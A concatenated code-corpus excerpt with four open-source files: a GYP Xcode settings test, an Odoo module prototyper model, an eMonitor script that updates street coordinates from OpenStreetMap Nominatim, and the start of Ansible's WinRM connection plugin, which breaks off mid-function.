#!/usr/bin/env python # Copyright (c) 2012 Google Inc. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. """ Verifies that dependent Xcode settings are processed correctly. """ import TestGyp import subprocess import sys def XcodeVersion(): stdout = subprocess.check_output(['xcodebuild', '-version']) version = stdout.splitlines()[0].split()[-1].replace('.', '') return (version + '0' * (3 - len(version))).zfill(4) if sys.platform == 'darwin': test = TestGyp.TestGyp(formats=['ninja', 'make', 'xcode']) CHDIR = 'xcode-env-order' INFO_PLIST_PATH = 'Test.app/Contents/Info.plist' test.run_gyp('test.gyp', chdir=CHDIR) test.build('test.gyp', test.ALL, chdir=CHDIR) # Env vars in 'copies' filenames. test.built_file_must_exist('Test-copy-brace/main.c', chdir=CHDIR) test.built_file_must_exist('Test-copy-paren/main.c', chdir=CHDIR) test.built_file_must_exist('Test-copy-bare/main.c', chdir=CHDIR) # Env vars in 'actions' filenames and inline actions test.built_file_must_exist('action-copy-brace.txt', chdir=CHDIR) test.built_file_must_exist('action-copy-paren.txt', chdir=CHDIR) test.built_file_must_exist('action-copy-bare.txt', chdir=CHDIR) # Env vars in 'rules' filenames and inline actions test.built_file_must_exist('rule-copy-brace.txt', chdir=CHDIR) test.built_file_must_exist('rule-copy-paren.txt', chdir=CHDIR) # TODO: see comment in test.gyp for this file. #test.built_file_must_exist('rule-copy-bare.txt', chdir=CHDIR) # Env vars in Info.plist. 
info_plist = test.built_file_path(INFO_PLIST_PATH, chdir=CHDIR) test.must_exist(info_plist) test.must_contain(info_plist, '''\ \t<key>BraceProcessedKey1</key> \t<string>D:/Source/Project/Test</string>''') test.must_contain(info_plist, '''\ \t<key>BraceProcessedKey2</key> \t<string>/Source/Project/Test</string>''') test.must_contain(info_plist, '''\ \t<key>BraceProcessedKey3</key> \t<string>com.apple.product-type.application:D:/Source/Project/Test</string>''') test.must_contain(info_plist, '''\ \t<key>ParenProcessedKey1</key> \t<string>D:/Source/Project/Test</string>''') test.must_contain(info_plist, '''\ \t<key>ParenProcessedKey2</key> \t<string>/Source/Project/Test</string>''') test.must_contain(info_plist, '''\ \t<key>ParenProcessedKey3</key> \t<string>com.apple.product-type.application:D:/Source/Project/Test</string>''') test.must_contain(info_plist, '''\ \t<key>BareProcessedKey1</key> \t<string>D:/Source/Project/Test</string>''') test.must_contain(info_plist, '''\ \t<key>BareProcessedKey2</key> \t<string>/Source/Project/Test</string>''') # NOTE: For bare variables, $PRODUCT_TYPE is not replaced! It _is_ replaced # if it's not right at the start of the string (e.g. ':$PRODUCT_TYPE'), so # this looks like an Xcode bug. This bug isn't emulated (yet?), so check this # only for Xcode. if test.format == 'xcode' and XcodeVersion() < '0500': test.must_contain(info_plist, '''\ \t<key>BareProcessedKey3</key> \t<string>$PRODUCT_TYPE:D:/Source/Project/Test</string>''') else: # The bug has been fixed by Xcode version 5.0.0. test.must_contain(info_plist, '''\ \t<key>BareProcessedKey3</key> \t<string>com.apple.product-type.application:D:/Source/Project/Test</string>''') test.must_contain(info_plist, '''\ \t<key>MixedProcessedKey</key> \t<string>/Source/Project:Test:mh_execute</string>''') test.pass_test()
gpl-3.0
Antiun/server-tools
module_prototyper/models/module_prototyper.py
26
20598
# -*- encoding: utf-8 -*- # ############################################################################# # # OpenERP, Open Source Management Solution # This module copyright (C) 2010 - 2014 Savoir-faire Linux # (<http://www.savoirfairelinux.com>). # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU Affero General Public License as # published by the Free Software Foundation, either version 3 of the # License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Affero General Public License for more details. # # You should have received a copy of the GNU Affero General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. # ############################################################################## import base64 import logging import lxml.etree import os import re import textwrap from collections import namedtuple from datetime import date from jinja2 import Environment, FileSystemLoader from openerp import models, api, fields from openerp.tools.safe_eval import safe_eval from . import licenses _logger = logging.getLogger(__name__) YEAR = date.today().year class ModulePrototyper(models.Model): """Module Prototyper gathers different information from all over the database to build a prototype of module. We are calling it a prototype as it will most likely need to be reviewed by a developer to fix glitch that would sneak it during the generation of files but also to add not supported features. 
""" _name = "module_prototyper" _description = "Module Prototyper" def get_default_description(self): """ Extract the content of default description """ filepath = '{}/../data/README.rst'.format(os.path.dirname(__file__)) with open(filepath, 'r') as content_file: content = content_file.read() return content license = fields.Selection( [ (licenses.GPL3, 'GPL Version 3'), (licenses.GPL3_L, 'GPL-3 or later version'), (licenses.LGPL3, 'LGPL-3'), (licenses.LGPL3_L, 'LGPL-3 or later version'), (licenses.AGPL3, 'Affero GPL-3'), (licenses.OSI, 'Other OSI Approved Licence'), ('Other proprietary', 'Other Proprietary') ], string='License', default=licenses.AGPL3, ) name = fields.Char( 'Technical Name', required=True, help=('The technical name will be used to define the name of ' 'the exported module, the name of the model.') ) category_id = fields.Many2one('ir.module.category', 'Category') human_name = fields.Char( 'Module Name', required=True, help=('The Module Name will be used as the displayed name of the ' 'exported module.') ) summary = fields.Char('Summary', required=True, help=('Enter a summary of your module')) description = fields.Text( 'Description', required=True, help=('Enter the description of your module, what it does, how to ' 'install, configure and use it, the roadmap or known issues. 
' 'The description will be exported in README.rst'), default=get_default_description ) author = fields.Char('Author', required=True, help=('Enter your name')) maintainer = fields.Char( 'Maintainer', help=('Enter the name of the person or organization who will ' 'maintain this module') ) website = fields.Char('Website', help=('Enter the URL of your website')) icon_image = fields.Binary( 'Icon', help=('The icon set up here will be used as the icon ' 'for the exported module also') ) version = fields.Char( 'Version', size=9, default='8.0.1.0.0', help=('Enter the version of your module with 5 digits') ) auto_install = fields.Boolean( 'Auto Install', default=False, help='Check if the module should be install by default.' ) application = fields.Boolean( 'Application', default=False, help='Check if the module is an Odoo application.' ) # Relations dependency_ids = fields.Many2many( 'ir.module.module', 'module_prototyper_module_rel', 'module_prototyper_id', 'module_id', 'Dependencies', help=('Enter the list of required modules that need to be installed ' 'for your module to work properly') ) data_ids = fields.Many2many( 'ir.filters', 'prototype_data_rel', 'module_prototyper_id', 'filter_id', 'Data filters', help="The records matching the filters will be added as data." ) demo_ids = fields.Many2many( 'ir.filters', 'prototype_demo_rel', 'module_prototyper_id', 'filter_id', 'Demo filters', help="The records matching the filters will be added as demo data." ) field_ids = fields.Many2many( 'ir.model.fields', 'prototype_fields_rel', 'module_prototyper_id', 'field_id', 'Fields', help=('Enter the list of fields that you have created or modified ' 'and want to export in this module. New models will be ' 'exported as long as you choose one of his fields.') ) menu_ids = fields.Many2many( 'ir.ui.menu', 'prototype_menu_rel', 'module_prototyper_id', 'menu_id', 'Menu Items', help=('Enter the list of menu items that you have created and want ' 'to export in this module. 
Related windows actions will be ' 'exported as well.') ) view_ids = fields.Many2many( 'ir.ui.view', 'prototype_view_rel', 'module_prototyper_id', 'view_id', 'Views', help=('Enter the list of views that you have created and want to ' 'export in this module.') ) group_ids = fields.Many2many( 'res.groups', 'prototype_groups_rel', 'module_prototyper_id', 'group_id', 'Groups', help=('Enter the list of groups that you have created and want to ' 'export in this module.') ) right_ids = fields.Many2many( 'ir.model.access', 'prototype_rights_rel', 'module_prototyper_id', 'right_id', 'Access Rights', help=('Enter the list of access rights that you have created and ' 'want to export in this module.') ) rule_ids = fields.Many2many( 'ir.rule', 'prototype_rule_rel', 'module_prototyper_id', 'rule_id', 'Record Rules', help=('Enter the list of record rules that you have created and ' 'want to export in this module.') ) report_ids = fields.Many2many( 'ir.actions.report.xml', 'prototype_report_rel', 'module_prototyper_id', 'report_id', 'Reports', help=('Enter the list of reports that you have created and ' 'want to export in this module.') ) activity_ids = fields.Many2many( 'workflow.activity', 'prototype_wf_activity_rel', 'module_prototyper_id', 'activity_id', 'Activities', help=('Enter the list of workflow activities that you have created ' 'and want to export in this module') ) transition_ids = fields.Many2many( 'workflow.transition', 'prototype_wf_transition_rel', 'module_prototyper_id', 'transition_id', 'Transitions', help=('Enter the list of workflow transitions that you have created ' 'and want to export in this module') ) _env = None _data_files = () _demo_files = () _field_descriptions = None File_details = namedtuple('file_details', ['filename', 'filecontent']) template_path = '{}/../templates/'.format(os.path.dirname(__file__)) @api.model def set_jinja_env(self, api_version): """Set the Jinja2 environment. 
The environment will helps the system to find the templates to render. :param api_version: string, odoo api :return: jinja2.Environment instance. """ if self._env is None: self._env = Environment( lstrip_blocks=True, trim_blocks=True, loader=FileSystemLoader( os.path.join(self.template_path, api_version) ) ) return self._env def set_field_descriptions(self): """Mock the list of fields into dictionary. It allows us to add or change attributes of the fields. :return: None """ for field in self.field_ids: field_description = {} # This will mock a field record. # the mock will allow us to add data or modify the data # of the field (like for the name) with keeping all the # attributes of the record. field_description.update({ attr_name: getattr(field, attr_name) for attr_name in dir(field) if not attr_name[0] == '_' }) field_description['name'] = self.unprefix(field.name) self._field_descriptions[field] = field_description @api.model def generate_files(self): """ Generates the files from the details of the prototype. :return: tuple """ assert self._env is not None, \ 'Run set_env(api_version) before to generate files.' # Avoid sharing these across instances self._data_files = [] self._demo_files = [] self._field_descriptions = {} self.set_field_descriptions() file_details = [] file_details.extend(self.generate_models_details()) file_details.extend(self.generate_views_details()) file_details.extend(self.generate_menus_details()) file_details.append(self.generate_module_init_file_details()) file_details.extend(self.generate_data_files()) # must be the last as the other generations might add information # to put in the __openerp__: additional dependencies, views files, etc. file_details.append(self.generate_module_openerp_file_details()) if self.icon_image: file_details.append(self.save_icon()) return file_details @api.model def save_icon(self): """Save the icon of the prototype as a image. The image is used afterwards as the icon of the exported module. 
:return: FileDetails instance """ # TODO: The image is not always a jpg. # 2 ways to do it: # * find a way to detect image type from the data # * add document as a dependency. # The second options seems to be better, as Document is a base module. return self.File_details( os.path.join('static', 'description', 'icon.jpg'), base64.b64decode(self.icon_image) ) @api.model def generate_module_openerp_file_details(self): """Wrapper to generate the __openerp__.py file of the module.""" return self.generate_file_details( '__openerp__.py', '__openerp__.py.template', prototype=self, data_files=self._data_files, demo_fiels=self._demo_files, ) @api.model def generate_module_init_file_details(self): """Wrapper to generate the __init__.py file of the module.""" return self.generate_file_details( '__init__.py', '__init__.py.template', # no import models if no work of fields in # the prototype models=bool(self.field_ids) ) @api.model def generate_models_details(self): """ Finds the models from the list of fields and generates the __init__ file and each models files (one by class). """ files = [] # TODO: doesn't work as need to find the module to import # and it is not necessary the name of the model the fields # belongs to. # ie. field.cell_phone is defined in a model inheriting from # res.partner. # How do we find the module the field was defined in? # dependencies = set([dep.id for dep in self.dependencies]) relations = {} field_descriptions = self._field_descriptions or {} for field in field_descriptions.itervalues(): model = field.get('model_id') relations.setdefault(model, []).append(field) # dependencies.add(model.id) # blind update of dependencies. 
# self.write({ # 'dependencies': [(6, 0, [id_ for id_ in dependencies])] # }) files.append(self.generate_models_init_details(relations.keys())) for model, custom_fields in relations.iteritems(): files.append(self.generate_model_details(model, custom_fields)) return files @api.model def generate_models_init_details(self, ir_models): """Wrapper to generate the __init__.py file in models folder.""" return self.generate_file_details( 'models/__init__.py', 'models/__init__.py.template', models=[ self.friendly_name(ir_model.model) for ir_model in ir_models ] ) @api.model def generate_views_details(self): """Wrapper to generate the views files.""" relations = {} for view in self.view_ids: relations.setdefault(view.model, []).append(view) views_details = [] for model, views in relations.iteritems(): filepath = 'views/{}_view.xml'.format( self.friendly_name(self.unprefix(model)) ) views_details.append( self.generate_file_details( filepath, 'views/model_views.xml.template', views=views ) ) self._data_files.append(filepath) return views_details @api.model def generate_menus_details(self): """Wrapper to generate the menus files.""" relations = {} for menu in self.menu_ids: if menu.action and menu.action.res_model: model = self.unprefix(menu.action.res_model) else: model = 'ir_ui' relations.setdefault(model, []).append(menu) menus_details = [] for model_name, menus in relations.iteritems(): model_name = self.unprefix(model_name) filepath = 'views/{}_menus.xml'.format( self.friendly_name(model_name) ) menus_details.append( self.generate_file_details( filepath, 'views/model_menus.xml.template', menus=menus, ) ) self._data_files.append(filepath) return menus_details @api.model def generate_model_details(self, model, field_descriptions): """Wrapper to generate the python file for the model. :param model: ir.model record. :param field_descriptions: list of ir.model.fields records. :return: FileDetails instance. 
""" python_friendly_name = self.friendly_name(self.unprefix(model.model)) return self.generate_file_details( 'models/{}.py'.format(python_friendly_name), 'models/model_name.py.template', name=python_friendly_name, model=model, fields=field_descriptions, ) @api.model def generate_data_files(self): """ Generate data and demo files """ data, demo = {}, {} filters = [ (data, ir_filter) for ir_filter in self.data_ids ] + [ (demo, ir_filter) for ir_filter in self.demo_ids ] for target, ir_filter in filters: model = ir_filter.model_id model_obj = self.env[model] target.setdefault(model, model_obj.browse([])) target[model] |= model_obj.search(safe_eval(ir_filter.domain)) res = [] for prefix, model_data, file_list in [ ('data', data, self._data_files), ('demo', demo, self._demo_files)]: for model_name, records in model_data.iteritems(): fname = self.friendly_name(self.unprefix(model_name)) filename = '{0}/{1}.xml'.format(prefix, fname) self._data_files.append(filename) res.append(self.generate_file_details( filename, 'data/model_name.xml.template', model=model_name, records=records, )) return res @classmethod def unprefix(cls, name): if not name: return name return re.sub('^x_', '', name) @classmethod def is_prefixed(cls, name): return bool(re.match('^x_', name)) @classmethod def friendly_name(cls, name): return name.replace('.', '_') @classmethod def fixup_domain(cls, domain): """ Fix a domain according to unprefixing of fields """ res = [] for elem in domain: if len(elem) == 3: elem = list(elem) elem[0] = cls.unprefix(elem[0]) res.append(elem) return res @classmethod def fixup_arch(cls, archstr): doc = lxml.etree.fromstring(archstr) for elem in doc.xpath("//*[@name]"): elem.attrib["name"] = cls.unprefix(elem.attrib["name"]) for elem in doc.xpath("//*[@attrs]"): try: attrs = safe_eval(elem.attrib["attrs"]) except Exception: _logger.error("Unable to eval attribute: %s, skipping", elem.attrib["attrs"]) continue if isinstance(attrs, dict): for key, val in attrs.iteritems(): 
if isinstance(val, (list, tuple)): attrs[key] = cls.fixup_domain(val) elem.attrib["attrs"] = repr(attrs) for elem in doc.xpath("//field"): # Make fields self-closed by removing useless whitespace if elem.text and not elem.text.strip(): elem.text = None return lxml.etree.tostring(doc) @api.model def generate_file_details(self, filename, template, **kwargs): """ generate file details from jinja2 template. :param filename: name of the file the content is related to :param template: path to the file to render the content :param kwargs: arguments of the template :return: File_details instance """ template = self._env.get_template(template) # keywords used in several templates. kwargs.update( { 'export_year': date.today().year, 'author': self.author, 'website': self.website, 'license_text': licenses.get_license_text(self.license), 'cr': self._cr, # Utility functions 'fixup_arch': self.fixup_arch, 'is_prefixed': self.is_prefixed, 'unprefix': self.unprefix, 'wrap': wrap, } ) return self.File_details(filename, template.render(kwargs)) # Utility functions for rendering templates def wrap(text, **kwargs): """ Wrap some text for inclusion in a template, returning lines keyword arguments available, from textwrap.TextWrapper: width=70 initial_indent='' subsequent_indent='' expand_tabs=True replace_whitespace=True fix_sentence_endings=False break_long_words=True drop_whitespace=True break_on_hyphens=True """ if not text: return [] wrapper = textwrap.TextWrapper(**kwargs) # We join the lines and split them again to offer a stable api for # the jinja2 templates, regardless of replace_whitspace=True|False text = "\n".join(wrapper.wrap(text)) return text.splitlines()
agpl-3.0
digifant/eMonitor
tools/update-osm-data.py
1
10402
#!/usr/bin/python # -*- coding: utf-8 -*- import logging import logging.handlers import traceback import os import time from optparse import OptionParser import MySQLdb import codecs import requests import sys import pdb import argparse from pprint import pprint def osmWebUrl (lat,lng): return "http://www.openstreetmap.org/?&mlat=%s&mlon=%s&zoom=17" % (lat,lng) def str2bool(v): if v.lower() in ('yes', 'true', 't', 'y', '1', 'j', 'ja'): return True elif v.lower() in ('no', 'false', 'f', 'n', '0', 'nein'): return False else: raise argparse.ArgumentTypeError('Boolean value expected.') def prompt(query): sys.stdout.write('%s [y/n]: ' % query) val = raw_input() try: ret = str2bool(val) except ValueError: sys.stdout.write('Please answer with a y/n\n') return prompt(query) return ret # returns None if not found! def queryOsmNominatin(street, streetno, city ): url = 'http://nominatim.openstreetmap.org/search' params = 'format=json&city={}&street={}'.format(city, street) #params = 'format=json&city=%s&street=%s' % (city, address) if streetno != '': params += ' {}'.format(streetno) params = params.replace (' ', '+') params = params.replace ('<', '&lt;') params = params.replace ('>', '&gt;') logging.debug ("OSM nominatim query: %s?%s" % (url,params)) headers = { 'User-Agent': 'OSMSyncForFireFighterStreetDbOfOurTown', 'From': 'bofhnospam@koffeinbetrieben.de' } r = requests.get('{}?{}'.format(url, params), timeout=3, headers=headers) #logging.debug("osm nomination result: %s" % pprint(r.json())) #import pdb; pdb.set_trace() _position = None try: _position = {'lat':r.json()[0]['lat'], 'lng':r.json()[0]['lon'], 'osm_id':r.json()[0]['osm_id'].decode('iso-8859-1').encode('utf8') } except IndexError: logging.error ("street %s not found! 
(housenumber=%s)" % (street, streetno)) #logging.debug (_position) return _position def updateMysqlStreets (db, user, passwd, command): # Open database connection db = MySQLdb.connect("localhost",user,passwd,db ) # prepare a cursor object using cursor() method cursor = db.cursor() # execute SQL query using execute() method. cursor.execute("SELECT VERSION()") # Fetch a single row using fetchone() method. data = cursor.fetchone() print "Database version : %s " % data not_found = {} if command == "update_position": sql = "SELECT * FROM streets" try: cursor.execute(sql) results = cursor.fetchall() for row in results: print ("Street DB %s lat=%s lng=%s" % (row[1].decode('iso-8859-1').encode('utf8'), row[5], row[6]) ) if ( row[0] > 0 ): _position = queryOsmNominatin (street=row[1].decode('iso-8859-1').encode('utf8'), streetno='', city='Kleinblittersdorf') #No heavy uses (an absolute maximum of 1 request per second). #http://wiki.openstreetmap.org/wiki/Nominatim_usage_policy time.sleep (1) if _position != None: if row[9] == int(_position['osm_id']): sql = 'update streets set lat=%s, lng=%s where id = %s' % (float(_position['lat']), float(_position['lng']), int(row[0])) logging.debug ("sql query %s" % sql) try: cursor.execute(sql) db.commit() logging.info ("street %s updated lat and lng to (%s,%s)" % (row[1].decode('iso-8859-1').encode('utf8'), float(_position['lat']), float(_position['lng']))) except: db.rollback() logging.error ("SQL Error %s" % traceback.format_exc()) else: logging.fatal ("OSMID stimmt nicht überein! 
%s vs %s" % (row[9], _position['osm_id'] )) else: logging.fatal ("OSM nominatin Query failed!") not_found[row[0]] = row[1].decode('iso-8859-1').encode('utf8') except: logging.error ("DB Error %s" % traceback.format_exc() ) # disconnect from server db.close() logging.info ("Sync finished") if len(not_found) > 0: logging.error ("didnt found %s streets:" % len(not_found)) for k in not_found.keys(): logging.error ("not found: id=%s streetname=%s" % (k, not_found[k])) def verifyMysqlStreets (db, user, passwd, command, street=-1): # Open database connection db = MySQLdb.connect("localhost",user,passwd,db ) # prepare a cursor object using cursor() method cursor = db.cursor() # execute SQL query using execute() method. cursor.execute("SELECT VERSION()") # Fetch a single row using fetchone() method. data = cursor.fetchone() print "Database version : %s " % data not_found = {} if command == "verify_streets": sql = "SELECT * FROM streets" if street > 0: sql = sql + " where id=%i" % street try: cursor.execute(sql) results = cursor.fetchall() for row in results: print ("Street %s lat=%s lng=%s url=%s" % (row[1].decode('iso-8859-1').encode('utf8'), row[5], row[6], osmWebUrl(row[5],row[6]) ) ) if ( row[0] > 0 ): _position = queryOsmNominatin (street=row[1].decode('iso-8859-1').encode('utf8'), streetno='', city='Kleinblittersdorf') if _position != None: sql = 'update streets set lat=%s, lng=%s, osmid=%s where id = %s' % (float(_position['lat']), float(_position['lng']), int(_position['osm_id']), int(row[0])) logging.debug ("sql query %s" % sql) if row[9] == int(_position['osm_id']): logging.info ("osmid=%s db lat=%s db lng=%s OsmNominatim lat=%s lng=%s new url=%s" % (row[9], row[5], row[6], float(_position['lat']), float(_position['lng']), osmWebUrl(float(_position['lat']),float(_position['lng'])) ) ) if round(float(row[5]),4) != round(float(_position['lat']),4) or round(float(row[6]),4) != round(float(_position['lng']),4): logging.info ("%i NO MATCH" % row[9]) if options.ask_fix 
and prompt ("Fix?"): try: cursor.execute(sql) db.commit() logging.info ("street %s updated lat, lng, osmid to (%s,%s,%s)" % (row[1].decode('iso-8859-1').encode('utf8'), float(_position['lat']), float(_position['lng']), (_position['osm_id']))) except: db.rollback() logging.error ("SQL Error %s" % traceback.format_exc()) else: logging.info ("%i MATCH" % row[9]) else: logging.fatal ("OSMID stimmt nicht überein! %s vs %s url=%s" % (row[9], _position['osm_id'], osmWebUrl(float(_position['lat']),float(_position['lng'])))) if options.ask_fix and prompt ("Fix?"): try: cursor.execute(sql) db.commit() logging.info ("street %s updated lat, lng, osmid to (%s,%s,%s)" % (row[1].decode('iso-8859-1').encode('utf8'), float(_position['lat']), float(_position['lng']), (_position['osm_id']))) except: db.rollback() logging.error ("SQL Error %s" % traceback.format_exc()) else: logging.fatal ("OSM nominatin Query failed!") not_found[row[0]] = row[1].decode('iso-8859-1').encode('utf8') #No heavy uses (an absolute maximum of 1 request per second). 
#http://wiki.openstreetmap.org/wiki/Nominatim_usage_policy time.sleep (1) except: logging.error ("DB Error %s" % traceback.format_exc() ) # disconnect from server db.close() logging.info ("verify finished") if __name__ == '__main__': parser = OptionParser() parser.add_option("-d", "--database", dest="database", help="mysql database name", default="emonitor") parser.add_option("-u", "--user", dest="user", help="mysql user", default='emonitor') parser.add_option("-p", "--passwd", dest="passwd", help="mysql password", default='emonitor') parser.add_option("--update-streets-position", dest="update_streets_position", help="update positions for all streets", action="store_true", default=False) parser.add_option("--verify-street-position", dest="verify_street_position", help="verify positions for given street", type=int, default=-1) parser.add_option("-v", "--verify-all-streets-position", dest="verify_all_streets_position", help="verify positions for given street", action="store_true", default=False) parser.add_option("-a", "--ask-fix", dest="ask_fix", help="ask for fixing", action="store_true", default=False) (options, args) = parser.parse_args() #logging.basicConfig(filename='screenshot-and-telegram.log', level=logging.DEBUG) logging.basicConfig(level=logging.DEBUG) if options.update_streets_position: updateMysqlStreets (db=options.database, user=options.user, passwd=options.passwd, command="update_position") if options.verify_street_position > 0: verifyMysqlStreets (db=options.database, user=options.user, passwd=options.passwd, command="verify_streets", street=int(options.verify_street_position)) if options.verify_all_streets_position: verifyMysqlStreets (db=options.database, user=options.user, passwd=options.passwd, command="verify_streets") #queryOsmNominatin(street="Rexrothstraße", streetno='', city='Kleinblittersdorf')
bsd-3-clause
graingert/ansible
lib/ansible/plugins/connections/winrm.py
12
12782
# (c) 2014, Chris Church <chris@ninemoreminutes.com> # # This file is part of Ansible. # # Ansible is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # Ansible is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with Ansible. If not, see <http://www.gnu.org/licenses/>. from __future__ import (absolute_import, division, print_function) __metaclass__ = type import base64 import os import re import shlex import traceback from six.moves.urllib import parse try: from winrm import Response from winrm.exceptions import WinRMTransportError from winrm.protocol import Protocol except ImportError: raise AnsibleError("winrm is not installed") HAVE_KERBEROS = False try: import kerberos HAVE_KERBEROS = True except ImportError: pass from ansible import constants as C from ansible.errors import AnsibleError, AnsibleConnectionFailure, AnsibleFileNotFound from ansible.plugins.connections import ConnectionBase from ansible.plugins import shell_loader from ansible.utils.path import makedirs_safe from ansible.utils.unicode import to_bytes class Connection(ConnectionBase): '''WinRM connections over HTTP/HTTPS.''' transport_schemes = { 'http': [('kerberos', 'http'), ('plaintext', 'http'), ('plaintext', 'https')], 'https': [('kerberos', 'https'), ('plaintext', 'https')], } def __init__(self, *args, **kwargs): self.has_pipelining = False self.default_suffixes = ['.ps1', ''] self.protocol = None self.shell_id = None self.delegate = None self._shell_type = 'powershell' # TODO: Add runas support self.become_methods_supported=[] super(Connection, 
self).__init__(*args, **kwargs) @property def transport(self): ''' used to identify this connection object from other classes ''' return 'winrm' def _winrm_connect(self): ''' Establish a WinRM connection over HTTP/HTTPS. ''' port = self._play_context.port or 5986 self._display.vvv("ESTABLISH WINRM CONNECTION FOR USER: %s on PORT %s TO %s" % \ (self._play_context.remote_user, port, self._play_context.remote_addr), host=self._play_context.remote_addr) netloc = '%s:%d' % (self._play_context.remote_addr, port) exc = None for transport, scheme in self.transport_schemes['http' if port == 5985 else 'https']: if transport == 'kerberos' and (not HAVE_KERBEROS or not '@' in self._play_context.remote_user): continue if transport == 'kerberos': realm = self._play_context.remote_user.split('@', 1)[1].strip() or None else: realm = None endpoint = parse.urlunsplit((scheme, netloc, '/wsman', '', '')) self._display.debug('WINRM CONNECT: transport=%s endpoint=%s' % (transport, endpoint), host=self._play_context.remote_addr) protocol = Protocol( endpoint, transport=transport, username=self._play_context.remote_user, password=self._play_context.password, realm=realm ) try: protocol.send_message('') return protocol except WinRMTransportError as exc: err_msg = str(exc) if re.search(r'Operation\s+?timed\s+?out', err_msg, re.I): raise AnsibleError("the connection attempt timed out") m = re.search(r'Code\s+?(\d{3})', err_msg) if m: code = int(m.groups()[0]) if code == 401: raise AnsibleError("the username/password specified for this server was incorrect") elif code == 411: return protocol self._display.debug('WINRM CONNECTION ERROR: %s' % err_msg, host=self._play_context.remote_addr) continue if exc: raise AnsibleError(str(exc)) def _winrm_exec(self, command, args=(), from_exec=False): if from_exec: self._display.debug("WINRM EXEC %r %r" % (command, args), host=self._play_context.remote_addr) else: self._display.debugv("WINRM EXEC %r %r" % (command, args), 
host=self._play_context.remote_addr) if not self.protocol: self.protocol = self._winrm_connect() if not self.shell_id: self.shell_id = self.protocol.open_shell() command_id = None try: command_id = self.protocol.run_command(self.shell_id, command, args) response = Response(self.protocol.get_command_output(self.shell_id, command_id)) if from_exec: self._display.debug('WINRM RESULT %r' % response, host=self._play_context.remote_addr) else: self._display.debugv('WINRM RESULT %r' % response, host=self._play_context.remote_addr) self._display.debugv('WINRM STDOUT %s' % response.std_out, host=self._play_context.remote_addr) self._display.debugv('WINRM STDERR %s' % response.std_err, host=self._play_context.remote_addr) return response finally: if command_id: self.protocol.cleanup_command(self.shell_id, command_id) def _connect(self): if not self.protocol: self.protocol = self._winrm_connect() return self def exec_command(self, cmd, tmp_path, in_data=None, sudoable=True): super(Connection, self).exec_command(cmd, tmp_path, in_data=in_data, sudoable=sudoable) cmd = to_bytes(cmd) cmd_parts = shlex.split(cmd, posix=False) if '-EncodedCommand' in cmd_parts: encoded_cmd = cmd_parts[cmd_parts.index('-EncodedCommand') + 1] decoded_cmd = base64.b64decode(encoded_cmd) self._display.vvv("EXEC %s" % decoded_cmd, host=self._play_context.remote_addr) else: self._display.vvv("EXEC %s" % cmd, host=self._play_context.remote_addr) # For script/raw support. 
if cmd_parts and cmd_parts[0].lower().endswith('.ps1'): script = self._shell._build_file_cmd(cmd_parts, quote_args=False) cmd_parts = self._shell._encode_script(script, as_list=True) try: result = self._winrm_exec(cmd_parts[0], cmd_parts[1:], from_exec=True) except Exception as e: traceback.print_exc() raise AnsibleError("failed to exec cmd %s" % cmd) result.std_out = to_bytes(result.std_out) result.std_err = to_bytes(result.std_err) return (result.status_code, '', result.std_out, result.std_err) def put_file(self, in_path, out_path): super(Connection, self).put_file(in_path, out_path) self._display.vvv("PUT %s TO %s" % (in_path, out_path), host=self._play_context.remote_addr) if not os.path.exists(in_path): raise AnsibleFileNotFound("file or module does not exist: %s" % in_path) with open(in_path) as in_file: in_size = os.path.getsize(in_path) script_template = ''' $s = [System.IO.File]::OpenWrite("%s"); [void]$s.Seek(%d, [System.IO.SeekOrigin]::Begin); $b = [System.Convert]::FromBase64String("%s"); [void]$s.Write($b, 0, $b.length); [void]$s.SetLength(%d); [void]$s.Close(); ''' # Determine max size of data we can pass per command. script = script_template % (self._shell._escape(out_path), in_size, '', in_size) cmd = self._shell._encode_script(script) # Encode script with no data, subtract its length from 8190 (max # windows command length), divide by 2.67 (UTF16LE base64 command # encoding), then by 1.35 again (data base64 encoding). 
buffer_size = int(((8190 - len(cmd)) / 2.67) / 1.35) for offset in xrange(0, in_size, buffer_size): try: out_data = in_file.read(buffer_size) if offset == 0: if out_data.lower().startswith('#!powershell') and not out_path.lower().endswith('.ps1'): out_path = out_path + '.ps1' b64_data = base64.b64encode(out_data) script = script_template % (self._shell._escape(out_path), offset, b64_data, in_size) self._display.debug("WINRM PUT %s to %s (offset=%d size=%d)" % (in_path, out_path, offset, len(out_data)), host=self._play_context.remote_addr) cmd_parts = self._shell._encode_script(script, as_list=True) result = self._winrm_exec(cmd_parts[0], cmd_parts[1:]) if result.status_code != 0: raise IOError(result.std_err.encode('utf-8')) except Exception: traceback.print_exc() raise AnsibleError("failed to transfer file to %s" % out_path) def fetch_file(self, in_path, out_path): super(Connection, self).fetch_file(in_path, out_path) out_path = out_path.replace('\\', '/') self._display.vvv("FETCH %s TO %s" % (in_path, out_path), host=self._play_context.remote_addr) buffer_size = 2**19 # 0.5MB chunks makedirs_safe(os.path.dirname(out_path)) out_file = None try: offset = 0 while True: try: script = ''' If (Test-Path -PathType Leaf "%(path)s") { $stream = [System.IO.File]::OpenRead("%(path)s"); $stream.Seek(%(offset)d, [System.IO.SeekOrigin]::Begin) | Out-Null; $buffer = New-Object Byte[] %(buffer_size)d; $bytesRead = $stream.Read($buffer, 0, %(buffer_size)d); $bytes = $buffer[0..($bytesRead-1)]; [System.Convert]::ToBase64String($bytes); $stream.Close() | Out-Null; } ElseIf (Test-Path -PathType Container "%(path)s") { Write-Host "[DIR]"; } Else { Write-Error "%(path)s does not exist"; Exit 1; } ''' % dict(buffer_size=buffer_size, path=self._shell._escape(in_path), offset=offset) self._display.debug("WINRM FETCH %s to %s (offset=%d)" % (in_path, out_path, offset), host=self._play_context.remote_addr) cmd_parts = self._shell._encode_script(script, as_list=True) result = 
